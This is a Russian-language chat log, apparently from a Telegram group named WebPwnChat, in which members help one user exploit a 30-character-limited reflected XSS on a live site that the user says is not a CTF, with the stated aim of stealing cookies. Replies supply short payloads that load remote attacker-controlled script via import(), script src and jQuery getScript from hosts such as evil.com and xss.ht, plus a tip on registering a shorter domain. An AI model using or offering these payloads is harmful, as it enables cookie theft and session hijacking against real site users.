Size: a a a

2020 April 19

/

/r in WebPwnChat
кто знает, в этом дыры есть?
источник

/

/r in WebPwnChat
источник

А

Алексей in WebPwnChat
/r
кто знает, в этом дыры есть?
Чем более комплексная система, тем больше шансы

Судя по дизайну - шансы высоки
источник
2020 April 20

КР

Криптослав Рутовски in WebPwnChat
Алексей
Чем более комплексная система, тем больше шансы

Судя по дизайну - шансы высоки
судя по дизайну - чистый WP без плагинов. так что, скорее всего, нет :)
источник

в

вжух in WebPwnChat
парни, если xss работает так:
сайт/'-alert()-'
сюда возможно вписать код на 30 символов для кражи куков (типа script src= наш сайт) или что-то импактивное?
источник

в

вжух in WebPwnChat
лимит только 30 символов
источник

LF

Luan Freno in WebPwnChat
%27-import(%22https://evil.com/1.js%22)-%27
источник

А

Алексей in WebPwnChat
вжух
парни, если xss работает так:
сайт/'-alert()-'
сюда возможно вписать код на 30 символов для кражи куков (типа script src= наш сайт) или что-то импактивное?
Srcipt src=//asdf.xss.ht
источник

в

вжух in WebPwnChat
спасибо, как я понял 30 символов анреал?
источник

А

Алексей in WebPwnChat
вжух
спасибо, как я понял 30 символов анреал?
<script src=//asdf.xss.ht>
Зарегай aa.ab, будет еще короче
источник

в

вжух in WebPwnChat
хотя, '-import("https://sss.sss")-' ?
источник

自閉症のポイント in WebPwnChat
вжух
парни, если xss работает так:
сайт/'-alert()-'
сюда возможно вписать код на 30 символов для кражи куков (типа script src= наш сайт) или что-то импактивное?
Эт не цтф случайно?
источник

в

вжух in WebPwnChat
自閉症のポイント
Эт не цтф случайно?
нет))
источник

в

вжух in WebPwnChat
Алексей
<script src=//asdf.xss.ht>
Зарегай aa.ab, будет еще короче
нене, это такая рефлектед где онли через '-
источник

в

вжух in WebPwnChat
спасибо всем
источник

自閉症のポイント in WebPwnChat
вжух
нене, это такая рефлектед где онли через '-
А jqery там нету? Там через $getscript можно
источник

в

вжух in WebPwnChat
вжух
нене, это такая рефлектед где онли через '-
к сожалению только так
источник

А

Алексей in WebPwnChat
自閉症のポイント
А jqery там нету? Там через $getscript можно
30 символов?)
источник

в

вжух in WebPwnChat
вжух
хотя, '-import("https://sss.sss")-' ?
не сработало,404. мем
источник

自閉症のポイント in WebPwnChat
Алексей
30 символов?)
Ну $getscript(//ad.xss.ht)
источник